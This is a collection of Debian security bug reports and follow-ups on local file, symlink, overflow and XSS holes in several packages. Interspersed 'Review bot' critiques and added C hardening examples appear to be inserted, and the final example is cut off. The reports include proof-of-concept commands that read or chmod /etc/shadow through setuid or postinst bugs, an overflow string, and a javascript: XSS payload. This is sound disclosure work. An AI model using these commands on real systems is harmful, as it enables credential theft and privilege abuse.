Bug#809252: node-cli: insecure use of temporary files

2015-12-28 Thread Steve Kemp

Package: node-cli
Version: 0.4.4~20120516-1
Severity: critical
Tags: security

Dear Maintainer,

The `node-cli` library makes insecure use of the following two
temporary files:

lock_file = '/tmp/' + cli.app + '.pid',
log_file = '/tmp/' + cli.app + '.log';

These allow overwriting files that the starting-user has permission
to modify.



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)



Bug#808730: stalin: Insecure use of temporary files

2015-12-22 Thread Steve Kemp

Package: stalin
Version: 0.11-5
Severity: critical
Tags: security


When `stalin` launches it attempts to detect its environment via
the following code in /usr/lib/stalin/QobiScheme.sc:

   
(system "uname -m >/tmp/QobiScheme.tmp")
...
(system "rm -f /tmp/QobiScheme.tmp"))

This is a prime example of the insecure use of temporary files,
and allows overwriting any file owned by the user who invokes
stalin.

Trivial demonstration:


$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory

Now run the sample code:


$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello

And we see this:

$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages stalin depends on:
ii  dpkg-dev   1.17.26
ii  libc6  2.19-18+deb8u1
ii  libgc-dev  1:7.2d-6.4

stalin recommends no packages.

stalin suggests no packages.

-- no debconf information


Steve
-- 



Bug#730189: ruby1.8: CVE-2013-4164

2013-11-28 Thread Steve Kemp
  The patches seem to work successfully for me:

  * The test-suite that runs at compile-time still passes.
 
  * The reproducer stops segfaulting.

  The reproducer I'm using is:

--
#!/usr/bin/ruby1.8
require 'json'
JSON.parse("[1."+"1"*30+"]")
--

Steve
-- 
http://www.steve.org.uk/


Bug#651896: Acknowledgement (njam: Insecure usage of environmental variable)

2011-12-13 Thread Steve Kemp

  Simple patch:

--- src/njam.cpp-orig   2011-12-13 17:06:04.0 +
+++ src/njam.cpp2011-12-13 17:07:08.0 +
@@ -339,7 +339,7 @@
sprintf(linux_sdl_driver, x11\0);
char *driver_name = getenv(SDL_VIDEODRIVER);
if (driver_name)
-   sprintf(linux_sdl_driver, %s\0, driver_name);
+   snprintf(linux_sdl_driver, sizeof(linux_sdl_driver)-1, %s, 
driver_name);
 
if (UseDGA)
{
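
Review bot: in the `+` line, `sizeof(linux_sdl_driver)-1` is only meaningful if `linux_sdl_driver` is a char array; if it is a pointer, sizeof yields the pointer size and the copy is silently cut to a handful of bytes, so confirm the declaration. snprintf already reserves room for the terminating NUL, so the full `sizeof(linux_sdl_driver)` is sufficient and clearer. The larger gap is that an over-long SDL_VIDEODRIVER is now truncated silently and still handed to SDL: check the return value (a result at or above the buffer size means truncation) and fall back to the default `x11` in that case. The `\0` inside the removed line's format string was redundant as well, since the sprintf family terminates the string itself.
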



Steve
-- 
http://edinburgh-portraits.com/



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#651896: njam: Insecure usage of environmental variable

2011-12-12 Thread Steve Kemp

Package: njam
Version: 1.25-5
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The setgid(games) binary /usr/games/njam makes insecure use of the 
environmental variable SDL_VIDEODRIVER.

This potentially allows the execution of arbitrary code, as the
following example shows:

1.  Setup the variable:

birthday:~# export SDL_VIDEODRIVER=$(perl -e "print 'x'x300")


2.  Launch the binary under gdb so we can see what happens:

birthday:~# gdb /usr/games/njam
(gdb) run
Starting program: /usr/games/njam 
..
Program received signal SIGSEGV, Segmentation fault.
0x00404f48 in ?? ()
(gdb) bt
0  0x00404f48 in ?? ()
1  0x7878787878787878 in ?? ()
2  0x7878787878787878 in ?? ()
3  0x7878787878787878 in ?? ()

  0x78 == x == Code execution via overflow.


  This is probably a minor issue, but should be simple to patch.

-- System Information:
Debian Release: 6.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages njam depends on:
ii  libc62.11.2-10   Embedded GNU C Library: Shared lib
ii  libgcc1  1:4.4.5-8   GCC support library
ii  libsdl-image1.2  1.2.10-2+b2 image loading library for Simple D
ii  libsdl-mixer1.2  1.2.8-6.3   mixer library for Simple DirectMed
ii  libsdl-net1.21.2.7-2 network library for Simple DirectM
ii  libsdl1.2debian  1.2.14-6.1  Simple DirectMedia Layer
ii  libstdc++6   4.4.5-8 The GNU Standard C++ Library v3

njam recommends no packages.

njam suggests no packages.

-- no debconf information
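
The crash above comes from formatting an attacker-controlled environment variable into a fixed-size buffer with no bound. The following C code is an added example, not njam's own source: it shows the defensive pattern a complete fix needs, namely copying with `snprintf()`, treating a return value at or beyond the buffer size as truncation, and falling back to the default driver rather than passing a chopped name on to SDL. `DRIVER_NAME_MAX`, the identifier-only character check and the `select_driver` API are assumptions made for the demo; njam's real buffer size is not shown in the report, and the `x11` default is the one its code uses.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for the demo; the report does not show njam's. */
#define DRIVER_NAME_MAX 32

/* SDL video driver names are short identifiers ("x11", "fbcon", "dga", ...).
 * Anything outside [A-Za-z0-9_] is rejected before it goes near SDL.
 * This is an assumed policy for the example, not something njam does. */
static int name_is_sane(const char *v) {
    if (*v == '\0') return 0;
    for (; *v != '\0'; v++)
        if (!isalnum((unsigned char)*v) && *v != '_') return 0;
    return 1;
}

/* Fills dst (dstsz bytes) with the driver to use.
 * Returns 0 when value was accepted and copied,
 *         1 when value was unset/empty (dst holds def),
 *        -1 when value was rejected or did not fit (dst holds def).
 * snprintf() always NUL-terminates within dstsz and reports the length the
 * full string would have had, so n >= dstsz is the truncation signal. */
int select_driver(const char *value, const char *def, char *dst, size_t dstsz) {
    if (dstsz == 0) return -1;
    snprintf(dst, dstsz, "%s", def);
    if (value == NULL || *value == '\0') return 1;
    if (!name_is_sane(value)) return -1;

    int n = snprintf(dst, dstsz, "%s", value);
    if (n < 0 || (size_t)n >= dstsz) {
        /* Truncated: an oversized name is not a real driver. Restore the
         * default instead of handing SDL the first dstsz-1 bytes of junk. */
        snprintf(dst, dstsz, "%s", def);
        return -1;
    }
    return 0;
}

/* The shape of the call njam makes: read SDL_VIDEODRIVER, default to x11. */
int select_driver_from_env(char *dst, size_t dstsz) {
    return select_driver(getenv("SDL_VIDEODRIVER"), "x11", dst, dstsz);
}

int main(void) {
    char buf[DRIVER_NAME_MAX];
    int rc = select_driver_from_env(buf, sizeof buf);
    printf("driver=%s (%s)\n", buf,
           rc == 0 ? "from environment" : rc == 1 ? "default" : "rejected, default");
    return 0;
}
```

With a 300-byte `SDL_VIDEODRIVER` the function returns -1 and `buf` still reads `x11`; a plain `snprintf` without the return check would instead pass a 31-byte run of `x` to SDL, which is not a memory error any more but is still garbage input the program never validated.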







Bug#553948: winkeydaemon: Symlink attack allows creation of arbitrary files

2009-11-02 Thread Steve Kemp
Package: winkeydaemon
Version: 1.0.1-3
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

  This is probably not a hugely exploitable issue, but reporting
 regardless:

 winkeydaemon.pl:

if (-d "/tmp/.winkey") {
    # ok, no action required
} else {
    my $dir = "/tmp/.winkey";
    `mkdir $dir`;
    if ($debug) {print "Arranging mutex directory\n";}
}
...
...
`touch /tmp/.winkey/keyer_busy`;
...
`rm /tmp/.winkey/keyer_busy`;
...


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages winkeydaemon depends on:
ii  libdevice-serialport-perl 1.04-2+b1  emulation of Win32::SerialPort for

winkeydaemon recommends no packages.

winkeydaemon suggests no packages.






Bug#548684: oping allows reading arbitrary files upon the local system - security issue

2009-09-28 Thread Steve Kemp

Package: oping
Version: 1.3.2-1
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

 oping is setuid root and one of the command line arguments allows
 a configuration file to be specified.  This file is read and *reported*
 to the console.  (Unless the file contains contents which can be
 interpreted as a list of hostnames!)

 For example:

 s...@gold:~$ oping  -f /etc/shadow
 Adding host `root:$1eluded/value:14368:0:9:7:::' failed: getaddrinfo: Name 
or service not known
 Adding host `daemon:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `bin:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `sys:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `sync:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `games:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known

  This is clearly a security hole - however the good news is that the
 version(s) of oping included in lenny and etch are unaffected.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages oping depends on:
ii  libc6 2.9-26 GNU C Library: Shared libraries
ii  liboping0 1.3.2-1C/C++ library to generate ICMP ECH

oping recommends no packages.

oping suggests no packages.

-- no debconf information






Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-18 Thread Steve Kemp
On Fri Sep 18, 2009 at 13:38:39 +0200, Arnaud Fontaine wrote:

 I have prepared  yesterday a package for Lenny  including this patch. At
 the moment, I'm waiting for a reply from the debian-security team.

  Great.  Don't forget etch too.

 Thank you very much for the patch and bug report.

  Did you see the followup discussion from Secunia about another
 planet-problem, relating to the handling of CDATA ?

  (To be honest if I were to re-do the patch now I'd probably
 do it the other way round : Make sure src starts with http:
 to cover other cases too.)

Steve
--







Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-18 Thread Steve Kemp
On Fri Sep 18, 2009 at 14:06:44 +0200, Arnaud Fontaine wrote:

 No I didn't, I could not find this discussion, could you please point it
 me out?   As soon as all these  issues will have been  addressed, I will
 prepare  a  package (debian-security  team:  please  do  not upload  the
 package for now).

 Basically it comes down to CDATA and the handling of description

 This is the comment I received:

--
 please find attached the two reproducers for the CDATA thing. poc1.xml
 is not correctly filtered while poc2.xml is filtered, although they are
 nearly identical.

 If you edit the newly patched function to print the k and v values,
 you'll see that the attributes aren't passed through.
--

Steve
--


poc1.xml
Description: XML document


poc2.xml
Description: XML document


Bug#546178: Updated patch

2009-09-15 Thread Steve Kemp
  The patch doesn't account for case variations, so it should be updated:

+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == src ) or ( k == href ) ) and 
(v.lower().find(javascript: )  -1 ):
+del attrs[i]
+
 return attrs
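
Review bot: `del attrs[i]` inside `for i in xrange (len (attrs))` is unsafe: after a deletion the element that shifts into slot i is never examined, so two consecutive `src`/`href` attributes with javascript: values leave the second one in place, and once the list is shorter than the original `len(attrs)` the next `attrs[i]` raises IndexError. Rebuild the list instead, e.g. `attrs = [(k, v) for k, v in attrs if not (k in ('src', 'href') and 'javascript:' in v.lower())]`, which also carries the `.lower()` change this revision introduces.
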

Steve
--
http://www.steve.org.uk/






Bug#546179: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-11 Thread Steve Kemp
Subject: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet-venus
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  <img src="javascript:alert(1);">

At least Opera will execute this code.

The package in Lenny is vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used, written by upstream:

s...@senfl:~$ diff --unified scrub.orig scrub.py
--- scrub.orig  2009-09-09 16:24:50.0 +
+++ scrub.py2009-09-09 16:25:18.0 +
@@ -128,5 +128,13 @@
 node['value'] = feedparser._resolveRelativeURIs(
 node.value, node.base, 'utf-8', node.type)

-node['value'] = feedparser._sanitizeHTML(
-node.value, 'utf-8', node.type)
+# Run this through HTML5's serializer
+from html5lib import html5parser, sanitizer, treebuilders
+from html5lib import treewalkers, serializer
+p = html5parser.HTMLParser(tokenizer=sanitizer.HTMLSanitizer,
+  tree=treebuilders.getTreeBuilder('dom'))
+doc = p.parseFragment(node.value, encoding='utf-8')
+xhtml = serializer.XHTMLSerializer(inject_meta_charset = False)
+walker = treewalkers.getTreeWalker('dom')
+tree = xhtml.serialize(walker(doc), encoding='utf-8')
+node['value'] = ''.join([str(token) for token in tree])
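
Review bot: the `from html5lib import ...` lines sit inside the per-entry code path, so the imports execute, and fail if python-html5lib is missing, for every node that reaches this branch; hoist them to module level so an absent dependency fails at start-up, and add python-html5lib to the package's Depends since sanitisation now relies on it entirely. The old `feedparser._sanitizeHTML` call is removed rather than kept as a fallback, so there is no degraded mode if the import fails; either make html5lib a hard dependency as above or wrap the import in `except ImportError` and keep the old call for that case.
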


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash







Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

2009-09-11 Thread Steve Kemp
Subject: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  <img src="javascript:alert(1);">

At least Opera will execute this code.

The packages in Etch and Lenny are vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/etch/
+
 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used:

--- planet-2.0.orig/planet/sanitize.py
+++ planet-2.0/planet/sanitize.py
@@ -70,6 +70,12 @@
 # utility method to be called by descendants
 attrs = [(k.lower(), v) for k, v in attrs]
 attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in 
attrs]
+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == src ) or ( k == href ) ) and (v.find(javascript: 
)  -1 ):
+del attrs[i]
+
 return attrs

 def unknown_starttag(self, tag, attrs):
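
Review bot: two points on the `+` block. First, `del attrs[i]` while iterating `xrange (len (attrs))` skips the element that moves into slot i and raises IndexError once the list has shrunk below its original length; filter into a new list instead. Second, `v.find(javascript:)` is a single-substring deny-list that matches only that exact spelling, which the 2009-09-15 follow-up in this thread already has to amend with `.lower()`; the 2009-09-18 follow-up points the better way, keep `src`/`href` only when the value has no scheme or its scheme is on an allow-list (http, https) and drop everything else, so no further spellings or schemes need enumerating.
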


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
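
The two planet reports above, and the planet-venus one, hinge on a `src`/`href` value whose scheme is `javascript:`; the patch removes values containing that substring, and the 2009-09-18 follow-up suggests the stronger test of requiring the value to start with `http:`. The following C code is an added example, neither planet's sanitizer nor the upstream patch: it implements that allow-list idea the way a browser reads the URL (leading blanks and control characters skipped, embedded tab/CR/LF ignored, scheme compared case-insensitively, anything without a scheme treated as a relative reference) and scrubs an attribute list by compacting it rather than deleting in place. The allow-list contents, the `struct attr` shape and the sample attributes are constructed for the example; keys are assumed already lower-cased, as planet's code does before this point.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Schemes a feed may reference. Assumed policy for this example; the thread
 * itself only suggests checking for an "http:" prefix. */
static const char *const ALLOWED_SCHEMES[] = { "http", "https", NULL };

/* Returns 1 if a src/href value may be kept, 0 if it must be dropped.
 * Kept: relative references (no scheme) and absolute URLs whose scheme is on
 * the allow-list. Dropped: every other scheme (javascript:, data:, ...), so
 * a new bad scheme needs no new rule. */
int url_attr_allowed(const char *value) {
    char scheme[32];
    size_t n = 0;
    const char *p;

    if (value == NULL) return 0;
    while (*value != '\0' && (unsigned char)*value <= ' ') value++; /* leading blanks/controls */
    if (!isalpha((unsigned char)*value)) return 1;                /* cannot start a scheme */

    /* RFC 3986 scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) then ':' */
    for (p = value; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (c == '\t' || c == '\n' || c == '\r') continue;    /* browsers discard these */
        if (c == ':') break;
        if (!(isalnum(c) || c == '+' || c == '-' || c == '.')) return 1; /* relative ref */
        if (n >= sizeof scheme - 1) return 0;                 /* implausibly long: reject */
        scheme[n++] = (char)tolower(c);
    }
    if (*p != ':') return 1;                                  /* no ':' reached: relative */
    scheme[n] = '\0';

    for (const char *const *s = ALLOWED_SCHEMES; *s != NULL; s++)
        if (strcmp(scheme, *s) == 0) return 1;
    return 0;
}

/* One parsed attribute; keys already lower-cased. */
struct attr { const char *k; const char *v; };

/* Drops src/href attributes whose value fails url_attr_allowed(), compacting
 * the array in place and returning the new length. A separate write index
 * avoids the skip-one-element mistake of deleting from a list while
 * iterating over its original indices. */
size_t scrub_attrs(struct attr *attrs, size_t n) {
    size_t out = 0;
    for (size_t i = 0; i < n; i++) {
        int is_url = strcmp(attrs[i].k, "src") == 0 || strcmp(attrs[i].k, "href") == 0;
        if (is_url && !url_attr_allowed(attrs[i].v)) continue;
        attrs[out++] = attrs[i];
    }
    return out;
}

int main(void) {
    /* Constructed sample: the reported bypass plus two benign attributes. */
    struct attr img[] = {
        { "src",  "javascript:alert(1);" },
        { "alt",  "javascript:alert(1);" },   /* not a URL attribute: plain text, kept */
        { "href", "http://example.com/" },
    };
    size_t n = scrub_attrs(img, 3);
    for (size_t i = 0; i < n; i++) printf("%s=\"%s\"\n", img[i].k, img[i].v);
    return 0;
}
```

Only `src` and `href` are checked, mirroring the patch; a full sanitizer would also strip event-handler attributes and `style`, which is what the html5lib sanitizer in the planet-venus patch does.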







Bug#518122: Security issue in mantis

2009-03-04 Thread Steve Kemp
Package: mantis
Severity: grave
Tags: security
Version: 1.1.6+dfsg-2

  There's a security issue in the mantis version in lenny, at least,
 which allows registered users to run commands on the server.

  Details here:

http://secunia.com/advisories/32314/

  Patch here:


http://mantisbt.svn.sourceforge.net/viewvc/mantisbt/branches/BRANCH_1_1_0/mantisbt/core/utility_api.php?r1=5679r2=5678pathrev=5679

Steve
-- 
Stop blogforum spam
http://blogspam.net/






Bug#518122: Acknowledgement (Security issue in mantis)

2009-03-04 Thread Steve Kemp
  Looks like I filed this too soon - the bug is fixed in Lenny's
 package already.

Steve
-- 






Bug#509288: gnomad2: segfault on start up / vorbis comment headers

2008-12-22 Thread Steve Kemp
  The patch below my sig is sufficient to fix the bug.

  See here for more details:

http://blog.steve.org.uk/what_can_you_do__sparta_will_need_sons_.html

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/

s...@gold:/tmp$ diff --unified --ignore-space-change 
gnomad2-2.9.1/src/tagfile.c gnomad2-2.9.1.orig/src/tagfile.c
--- gnomad2-2.9.1/src/tagfile.c 2007-10-17 19:47:39.0 +0100
+++ gnomad2-2.9.1.orig/src/tagfile.c2008-12-22 22:25:18.0 +
@@ -59,9 +59,15 @@
 g_free(tmppath);
 return;  
   }
-  g_free(tmppath);
   
   tag = taglib_file_tag(file);
+  if ( tag == NULL ) {
+g_printf(tags were null in file %s, tmppath);
+g_free(tmppath);
+return;
+  }
+  g_free(tmppath);
+
   properties = taglib_file_audioproperties(file);
   
   gchar* artist = taglib_tag_artist(tag);
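
Review bot: the new early return after `if ( tag == NULL )` frees `tmppath` but not `file`, which at that point is an open TagLib handle (the existing early return a few lines above is in the branch where no handle was obtained); unless it is released elsewhere, add `taglib_file_free(file);` before the `return` so every untagged file does not leak one. The diagnostic `g_printf(tags were null in file %s, tmppath)` goes to stdout without a trailing newline; `g_warning()` is the GLib idiom for a recoverable error like this. Separately, the file the command names `.orig` is the modified copy (its timestamp is the 2008 one), so the headers are the reverse of the usual orig-first convention; `patch` still applies the hunk forward to `gnomad2-2.9.1/src/tagfile.c`, but the naming will confuse anyone reading it.
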







Bug#494648: The possibility of attack with the help of symlinks in some Debian packages

2008-08-13 Thread Steve Kemp
On Wed Aug 13, 2008 at 11:31:54 +1000, Sven Dowideit wrote:

 I will have to assume that this report is indeed incorrect unless I hear
 otherwise.

  On my Debian Etch system:

[EMAIL PROTECTED]:~$ apt-get source twiki
Reading package lists... Done
Building dependency tree... Done
Need to get 4304kB of source archives.
Get: 1 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (dsc) [639B]
Get: 2 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (tar) [4264kB]
Get: 3 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (diff) [39.3kB]
Fetched 4304kB in 7s (546kB/s)
gpg: Signature made Wed 21 Feb 2007 06:51:24 GMT using DSA key ID C0143D2D
gpg: Can't check signature: public key not found
dpkg-source: extracting twiki in twiki-4.0.5
dpkg-source: unpacking twiki_4.0.5.orig.tar.gz
dpkg-source: applying ./twiki_4.0.5-9.1.diff.gz

[EMAIL PROTECTED]:~$ cd twiki-4.0.5/
[EMAIL PROTECTED]:~/twiki-4.0.5$ grep /tmp/twiki debian/postinst
if [ ! -e /tmp/twiki ]; then
mkdir /tmp/twiki
chmod 777 /tmp/twiki
chown $TWIKI_OWNER.www-data /tmp/twiki
[EMAIL PROTECTED]:~/twiki-4.0.5$


  So :

1.  If /tmp/twiki doesn't exist it is made as a directory.

2.  If it does exist its permissions are changed - unconditionally

  Let me exploit it:

[EMAIL PROTECTED]:~$
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo apt-get install twiki
Password:
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
  libalgorithm-diff-perl liblocale-maketext-lexicon-perl libtext-diff-perl rcs
Suggested packages:
...
...
Setting up libtext-diff-perl (0.35-2) ...
Setting up rcs (5.7-18) ...
Setting up twiki (4.0.5-9.1) ...
Adding password for user TWikiGuest
Reloading web server config...3224

   Now what happened?

   Nothing.  The directory /tmp/twiki was created and my symlink wasn't
 touched.  So we look safe.  But I'm not convinced.

   I know that I can coerce it into working:

[EMAIL PROTECTED]:~$ sudo rm -rf /tmp/twiki
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo /var/lib/dpkg/info/twiki.postinst configure
Reloading web server config...3224
.
[EMAIL PROTECTED]:~$ ls -l /etc/shadow
-rwxrwxrwx 1 www-data www-data 1093 2008-08-13 10:35 /etc/shadow

  I guess the difference is relating to the presence, or not, of 
 /var/lib/twiki/data ?

  Looks like merely installing the package wouldn't trigger this,
 but an upgrade might.  Or something like that !

Steve
--  







Bug#494648: The possibility of attack with the help of symlinks in some Debian packages

2008-08-13 Thread Steve Kemp
On Wed Aug 13, 2008 at 22:51:00 +1000, Sven Dowideit wrote:

 no, its got nothing to do with /var/lib/twiki/data etc, its the location
 for session data - produced by CGI::Session etc.

  Yes it does.
  
  The code we're talking about is contained in the file debian/postinst,
 and only executes under the following condition:

 # create initial htpasswd, if needed
 if [ -e /var/lib/twiki/data ]; then

...
...
#create securer-twiki session dir
mkdir ...

 fi

  My understanding of the discussion thus far is:

a.  This is a genuine bug.
b.  Which has been fixed.
c.  Except in Etch.

Steve
-- 






Bug#489756: poppler CVE-2008-2950 in etch

2008-07-09 Thread Steve Kemp
On Wed Jul 09, 2008 at 12:04:01 +0200, Wichert Akkerman wrote:
 I see CVE-2008-2960 reported in the BTS as #489756 but I see no mention  
 of a fix for stable. Is someone working on a DSA for stable?

  There isn't one in progress.  Tonight there will be a release of
 an update to handle CVE-2008-1693.  I guess that will be the next
 one.

Steve
-- 







Bug#480059: vorbis-tools vulnerable to CVE-2008-1686

2008-05-08 Thread Steve Kemp
On Wed May 07, 2008 at 18:12:09 -0400, Jamie Strandboge wrote:

 vorbis-tools contains embedded speex code, and although vorbis-tools is linked
 to libspeex, it compiles the vulnerable code. Attached is a debdiff that Ubuntu
 is using in its 1.1.1 versions of vorbis-tools (fuzz removed).

  I'd rather see a patch that makes the vorbis-tools link
 against the system-wide library, and not compile the vulnerable
 code at all.

  Would it be possible for you to provide such a thing, or is that
 too hard?

Steve
-- 






Bug#464756: kazehakase security fix patch

2008-04-17 Thread Steve Kemp
On Tue Apr 15, 2008 at 21:36:13 -0400, Andres Salomon wrote:

  Cool.  The package is here:
  
  http://people.debian.org/~dilinger/security/kazehakase/etch/
  
  I will give it a bit more testing later on tonight.

  Thanks.  I'll upload this tomorrow.  I assume this will
 be handled in the same way for Lenny / Sid?

Steve
-- 






Bug#464756: kazehakase security fix patch

2008-04-15 Thread Steve Kemp
On Tue Apr 15, 2008 at 15:46:02 -0400, Andres Salomon wrote:

 I'd rather see kaz linked against the system's pcre;
 it's much easier to deal w/.  Does the security team agree?

  Definitely!

Steve
-- 







Bug#475747: tss: Allows reading arbitrary files

2008-04-12 Thread Steve Kemp
Package: tss
Version: 0.8.1-3
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  Due to poor permission checking the tss binary allows local
 users to read arbitrary files upon the system.

  For example the following reveals the contents of the
 /etc/shadow file:

[EMAIL PROTECTED]:~$ tss -a /etc/shadow

  The code *should* drop privileges prior to opening
 any files, or failing that should stat() the file to ensure
 the caller may view it.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages tss depends on:
ii  libc6 2.7-10 GNU C Library: Shared libraries
ii  libncurses5   5.6+20080405-1 Shared libraries for terminal hand

tss recommends no packages.

-- no debconf information

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/
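
The oping and tss reports above share one defect: a privileged binary opens a path chosen by an unprivileged caller with its own (root) permissions, then echoes the contents back. The following C code is an added example, not code from either package: it implements the first remedy the tss report names, lowering the effective uid and gid to the invoker's real ids around the `open()` so the kernel enforces the caller's permissions, then regaining privilege for whatever the program genuinely needed it for. In a process that is not setuid/setgid, real and effective ids already match and the calls are no-ops. The `/tmp/invoker.XXXXXX` fixture, its contents and the `read_as_invoker` API are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Opens path with the invoking user's own credentials. In a setuid/setgid
 * binary the effective ids belong to the file owner (root for oping, games
 * for njam); dropping them to the real ids for the duration of open() makes
 * the kernel check the caller's rights, so /etc/shadow fails with EACCES
 * unless the caller could read it anyway. Returns an fd or -1 with errno set. */
int open_as_invoker(const char *path) {
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();

    /* Drop the group first: changing it afterwards would need the privileged uid. */
    if (setegid(rgid) != 0) return -1;
    if (seteuid(ruid) != 0) { setegid(egid); return -1; }

    int fd = open(path, O_RDONLY | O_CLOEXEC);
    int saved_errno = errno;

    /* Regain privilege in the opposite order: uid first, then group.
     * If that fails the process is in an unknown state; do not hand out the fd. */
    if (seteuid(euid) != 0 || setegid(egid) != 0) {
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* Reads up to bufsz-1 bytes of path as the invoker, NUL-terminates buf and
 * returns the byte count, or -1 if the invoker may not read it. */
long read_as_invoker(const char *path, char *buf, size_t bufsz) {
    if (bufsz == 0) return -1;
    int fd = open_as_invoker(path);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return (long)n;
}

/* Demo fixture: a private scratch file holding the constructed text "hello\n". */
int make_sample_file(char *path_out, size_t sz) {
    char tmpl[] = "/tmp/invoker.XXXXXX";
    int fd = mkstemp(tmpl);
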